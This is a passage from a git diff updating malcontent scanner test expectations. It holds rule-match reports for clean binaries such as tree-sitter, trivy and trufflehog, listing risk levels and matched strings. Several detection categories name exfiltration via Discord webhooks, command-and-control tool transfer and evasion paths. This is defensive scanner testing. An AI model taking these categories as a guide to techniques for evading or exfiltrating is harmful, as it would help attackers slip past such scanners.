[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/slic](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fslic&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/str/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fstr%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/time](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Ftime&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/io/mo](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fio%2Fmo&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/io/st](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fio%2Fst&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/os/fd](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fos%2Ffd&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sync/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsync%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sys/p](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsys%2Fp&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sys/s](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsys%2Fs&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/threa](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fthrea&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/addr2line-0.22](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Faddr2line-0.22&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/gimli-0.29.0/s](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fgimli-0.29.0%2Fs&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/hashbrown-0.14](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fhashbrown-0.14&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/miniz_oxide-0.](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fminiz_oxide-0.&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/rustc-demangle](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Frustc-demangle&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/config/s](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fconfig%2Fs&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/generate](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fgenerate&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/src/high](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fsrc%2Fhigh&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/highlight/sr](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fhighlight%2Fsr&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/binding_](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fbinding_&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/././](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2F.%2F&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./ge](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fge&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./la](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fla&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./pa](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fpa&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./qu](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fqu&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./st](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fst&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./su](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fsu&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./tr](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Ftr&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/tags/src/lib](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Ftags%2Fsrc%2Flib&type=code) |
+| MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) |
+| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [Content-Type](https://github.com/search?q=Content-Type&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) |
+| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) |
+| MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) |
+| LOW | [data/encoding/json_encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-encode.yara#JSONEncode) | encodes JSON | [JSON.stringify](https://github.com/search?q=JSON.stringify&type=code) |
+| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) |
+| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
+| LOW | [exec/dylib/iterate](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/iterate.yara#dl_iterate_phdr) | [iterate over list of shared objects](https://man7.org/linux/man-pages/man3/dl_iterate_phdr.3.html) | [dl_iterate_phdr](https://github.com/search?q=dl_iterate_phdr&type=code) |
+| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) |
+| LOW | [exec/shell/SHELL](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/SHELL.yara#SHELL) | [path to active shell](https://man.openbsd.org/login.1#ENVIRONMENT) | [SHELL](https://github.com/search?q=SHELL&type=code) |
+| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) |
+| LOW | [fs/directory/list](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-list.yara#GoReadDir) | Uses Go functions to list a directory | [.ReadDir](https://github.com/search?q=.ReadDir&type=code) |
+| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlinkat](https://github.com/search?q=unlinkat&type=code) |
+| LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) |
+| LOW | 
[fs/symlink_resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath) | [resolves symbolic links](https://man7.org/linux/man-pages/man3/realpath.3.html) | [realpath](https://github.com/search?q=realpath&type=code) |
+| LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) |
+| LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) |
+| LOW | [net/http/2](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http2.yara#http2) | Uses the HTTP/2 protocol | [HTTP/2](https://github.com/search?q=HTTP%2F2&type=code) |
+| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code) |
+| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) |
+| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) |
+| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) |
+| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvmsg](https://github.com/search?q=recvmsg&type=code) |
+| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code) |
+| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop](https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop)
[https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi](https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j)
[https://code.jquery.com/jquery-3.3.1.min.js](https://code.jquery.com/jquery-3.3.1.min.js)
[https://docs.rs/getrandom](https://docs.rs/getrandom)
[https://docs.rs/tree-sitter-language/](https://docs.rs/tree-sitter-language/)
[https://docs.rs/tree-sitter/](https://docs.rs/tree-sitter/)
[https://github.com/ChimeHQ/SwiftTreeSitter](https://github.com/ChimeHQ/SwiftTreeSitter)
[https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car](https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car)
[https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c](https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c)
[https://github.com/tree-sitter/tree-sitter-Failed](https://github.com/tree-sitter/tree-sitter-Failed)
[https://gitlab.com/https](https://gitlab.com/https)
[https://parser.cparser.h](https://parser.cparser.h)
[https://tree-sitter.github.io/tree-sitter.jshttps](https://tree-sitter.github.io/tree-sitter.jshttps)
[https://tree-sitter.github.io/tree-sitter.wasmhttps](https://tree-sitter.github.io/tree-sitter.wasmhttps)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png)
[https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT](https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT)
[https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j](https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j)
[https://tree-sitter.github.io/tree-sitter/creating-parsers](https://tree-sitter.github.io/tree-sitter/creating-parsers)
[https://tree-sitter.github.io/tree-sitter/playground](https://tree-sitter.github.io/tree-sitter/playground)
[https://tree-sitter.github.io/tree-sitter/syntax-highlighting](https://tree-sitter.github.io/tree-sitter/syntax-highlighting)
[https://tree-sitter.github.io/tree-sitter/using-parsers](https://tree-sitter.github.io/tree-sitter/using-parsers) |
+| LOW | [os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write) | writes to a file handle | [stdout.write(output)](https://github.com/search?q=stdout.write%28output%29&type=code) |
+| LOW | [process/chdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir.yara#chdir_shell) | changes working directory | [cd -u env -i](https://github.com/search?q=cd+-u++env+-i&type=code) |
+| LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) |
+| LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) |
+| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) |
+| LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) |
diff --git a/tests/linux/clean/trivy.simple b/tests/linux/clean/trivy.simple
index cadf870be..90b8d4846 100644
--- a/tests/linux/clean/trivy.simple
+++ b/tests/linux/clean/trivy.simple
@@ -6,8 +6,8 @@
 3P/threat_hunting/privilegeescalation: medium
 c2/addr/http_dynamic: medium
 c2/addr/ip: medium
+c2/addr/server: medium
 c2/discovery/ip_dns_resolver: medium
-c2/server_address: medium
 c2/tool_transfer/download: medium
 c2/tool_transfer/github_raw: medium
 collect/archives/unarchive: medium
@@ -53,18 +53,20 @@ discover/cloud/google_metadata: low
 discover/cloud/google_storage: low
 discover/network/mac_address: medium
 discover/network/netstat: medium
+discover/process/name: medium
 discover/processes/list: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/dmesg: low
+discover/system/hostname: low
 discover/system/platform: medium
 discover/system/sysinfo: medium
 discover/user/HOME: low
 discover/user/USER: low
 evasion/bypass_security/linux/iptables: medium
-evasion/covert_location/chdir_unusual: medium
-evasion/covert_location/dev_shm: medium
-evasion/hidden_paths/hidden: medium
-evasion/hidden_paths/var_run: medium
+evasion/file/location/chdir_unusual: medium
+evasion/file/location/dev_shm: medium
+evasion/file/location/var_run: medium
+evasion/file/prefix: medium
 exec/cmd: medium
 exec/conditional/LANG: low
 exec/dylib/symbol_address: medium
@@ -182,7 +184,6 @@ process/executable_path: low
 process/groupid_set: low
 process/groups_set: low
 process/multithreaded: low
-process/name_get: medium
 process/userid_set: low
 sus/exclamation: medium
 sus/intercept: medium
diff --git a/tests/linux/clean/trufflehog.md b/tests/linux/clean/trufflehog.md
index b356f137f..8389c0d6f 100644
--- a/tests/linux/clean/trufflehog.md
+++ b/tests/linux/clean/trufflehog.md
@@ -2,8 +2,8 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|-------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_http_url_with_question) | contains hardcoded endpoint with a question mark | 
[https://api.lessannoyingcrm.com?UserCode=](https://api.lessannoyingcrm.com?UserCode=)
[https://api.mesibo.com/api.php?op=useradd&token=https](https://api.mesibo.com/api.php?op=useradd&token=https)
[https://api.route4me.com/api.v4/address_book.php?api_key=https](https://api.route4me.com/api.v4/address_book.php?api_key=https)
[https://api.scraperapi.com?api_key=](https://api.scraperapi.com?api_key=)
[https://api.tomtom.com/map/1/tile/basic/main/0/0/0.png?view=Unified&key=ambiguous](https://api.tomtom.com/map/1/tile/basic/main/0/0/0.png?view=Unified&key=ambiguous)
[https://api.websitepulse.com/textserver.php?method=GetContacts&username=](https://api.websitepulse.com/textserver.php?method=GetContacts&username=)
[https://sslmate.com/api/v2/certs/example.com?expand=current](https://sslmate.com/api/v2/certs/example.com?expand=current)
[https://us1.locationiq.com/v1/reverse.php?key=https](https://us1.locationiq.com/v1/reverse.php?key=https) | -| HIGH | [c2/tool_transfer/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/download.yara#download_sites) | [References known file hosting site](https://github.com/ditekshen/detection/blob/e6579590779f62cbe7f5e14b5be7d77b2280f516/yara/indicator_high.yar#L1001) | [pastebin.com](https://github.com/search?q=pastebin.com&type=code)
[pastebin.go](https://github.com/search?q=pastebin.go&type=code) | +| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_url_with_question) | binary contains hardcoded URL with question mark | [https://api.mesibo.com/api.php?op=useradd&token=https](https://api.mesibo.com/api.php?op=useradd&token=https)
[https://api.route4me.com/api.v4/address_book.php?api_key=https](https://api.route4me.com/api.v4/address_book.php?api_key=https)
[https://api.websitepulse.com/textserver.php?method=GetContacts&username=](https://api.websitepulse.com/textserver.php?method=GetContacts&username=)
[https://us1.locationiq.com/v1/reverse.php?key=https](https://us1.locationiq.com/v1/reverse.php?key=https) | +| HIGH | [c2/tool_transfer/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/download.yara#download_sites) | [References known file hosting site](https://github.com/ditekshen/detection/blob/e6579590779f62cbe7f5e14b5be7d77b2280f516/yara/indicator_high.yar#L1001) | [pastebin.Scanner](https://github.com/search?q=pastebin.Scanner&type=code)
[pastebin.com/api/api_post](https://github.com/search?q=pastebin.com%2Fapi%2Fapi_post&type=code)
[pastebin.go](https://github.com/search?q=pastebin.go&type=code)
[pastebin.init](https://github.com/search?q=pastebin.init&type=code) | | HIGH | [c2/tool_transfer/grayware](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/grayware.yara#grayware_sites) | References websites that host code that can be used maliciously | [shodan.io](https://github.com/search?q=shodan.io&type=code) | | HIGH | [discover/ip/public](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/ip/public_ip.yara#iplookup_website) | public service to discover external IP address | [ipify.or](https://github.com/search?q=ipify.or&type=code) | | HIGH | [exfil/discord](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/discord.yara#discord_bot) | [Uses the Discord webhooks API](https://github.com/bartblaze/community/blob/3f3997f8c79c3605ae6d5324c8578cb12c452512/data/yara/binaries/indicator_high.yar#L706) | [discord.com/api/webhooks/](https://github.com/search?q=discord.com%2Fapi%2Fwebhooks%2F&type=code) | @@ -25,6 +25,7 @@ | MEDIUM | [anti-behavior/vm_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/vm-check.yara#vm_checker) | Checks to see if it is running with a VM | [GenuineIntel](https://github.com/search?q=GenuineIntel&type=code)
[VMware](https://github.com/search?q=VMware&type=code) | | MEDIUM | [c2/addr/http_dynamic](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/http-dynamic.yara#http_dynamic) | URL that is dynamically generated | [http://%sIncrementDecrementN1QLQueryGetRandom/api/pingrangeScanObserveVba](http://%sIncrementDecrementN1QLQueryGetRandom/api/pingrangeScanObserveVba)
[https://%s.api.mailchimp.com/3.0/https](https://%s.api.mailchimp.com/3.0/https)
[https://%s.api.mailchimp.com/3.0https](https://%s.api.mailchimp.com/3.0https)
[https://%s.billomat.net/api/v2/clients/myself](https://%s.billomat.net/api/v2/clients/myself)
[https://%s.caspio.com/oauth/tokenhttps](https://%s.caspio.com/oauth/tokenhttps)
[https://%s.currencycloud.com](https://%s.currencycloud.com)
[https://%s.fibery.io/api/commandsTruffleHog3](https://%s.fibery.io/api/commandsTruffleHog3)
[https://%s.flowlu.com/api/v1/module/crm/lead/list](https://%s.flowlu.com/api/v1/module/crm/lead/list)
[https://%s.formsite.com/api/v2/](https://%s.formsite.com/api/v2/)
[https://%s.kanbantool.com/api/v3/users/current.jsonhttps](https://%s.kanbantool.com/api/v3/users/current.jsonhttps)
[https://%s.leankit.com/io/accounthttps](https://%s.leankit.com/io/accounthttps)
[https://%s.s3](https://%s.s3)
[https://%s.salesmate.io/apis/v3/companies/1](https://%s.salesmate.io/apis/v3/companies/1)
[https://%s.scalr.io/api/iacp/v3/agentshttps](https://%s.scalr.io/api/iacp/v3/agentshttps)
[https://%s.vouchery.io/api/v2.0/usershttps](https://%s.vouchery.io/api/v2.0/usershttps)
[https://%s/account.json](https://%s/account.json)
[https://%s/admin/api/2024](https://%s/admin/api/2024)
[https://%s/admin/oauth/access_scopes.jsonadmin.conversations.removeCustomR](https://%s/admin/oauth/access_scopes.jsonadmin.conversations.removeCustomR)
[https://%s/api/laml/2010](https://%s/api/laml/2010)
[https://%s/api/v1/me20060102T150405Z0700InvalidClientTokenIdx](https://%s/api/v1/me20060102T150405Z0700InvalidClientTokenIdx)
[https://%s/api/v1/projects](https://%s/api/v1/projects)
[https://%s/api/v1/sources](https://%s/api/v1/sources)
[https://%s/api/v1/users/meopsgenie.com/alert/detail/https](https://%s/api/v1/users/meopsgenie.com/alert/detail/https)
[https://%s/api/v1/userserror](https://%s/api/v1/userserror)
[https://%s/api/v2/tickets](https://%s/api/v2/tickets)
[https://%s/api/v3/users/current.json](https://%s/api/v3/users/current.json)
[https://%s/auth/oauth2/v2/tokenhttps](https://%s/auth/oauth2/v2/tokenhttps)
[https://%s/invoices.json](https://%s/invoices.json)
[https://%s/v2/lastUpdateTimeBeamer](https://%s/v2/lastUpdateTimeBeamer)
[https://%sSCRAM](https://%sSCRAM) | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[aIp](https://github.com/search?q=aIp&type=code)
[a_ip](https://github.com/search?q=a_ip&type=code)
[accel_port](https://github.com/search?q=accel_port&type=code)
[allowed_port](https://github.com/search?q=allowed_port&type=code)
[announce_port](https://github.com/search?q=announce_port&type=code)
[client_ip](https://github.com/search?q=client_ip&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[fastly_ip](https://github.com/search?q=fastly_ip&type=code)
[firewall_ip](https://github.com/search?q=firewall_ip&type=code)
[geo_ip](https://github.com/search?q=geo_ip&type=code)
[getPort](https://github.com/search?q=getPort&type=code)
[hasPort](https://github.com/search?q=hasPort&type=code)
[htcp_port](https://github.com/search?q=htcp_port&type=code)
[http_port](https://github.com/search?q=http_port&type=code)
[i_ip](https://github.com/search?q=i_ip&type=code)
[icp_port](https://github.com/search?q=icp_port&type=code)
[in_ip](https://github.com/search?q=in_ip&type=code)
[ip_port](https://github.com/search?q=ip_port&type=code)
[is_port](https://github.com/search?q=is_port&type=code)
[lIp](https://github.com/search?q=lIp&type=code)
[localPort](https://github.com/search?q=localPort&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[lookupPort](https://github.com/search?q=lookupPort&type=code)
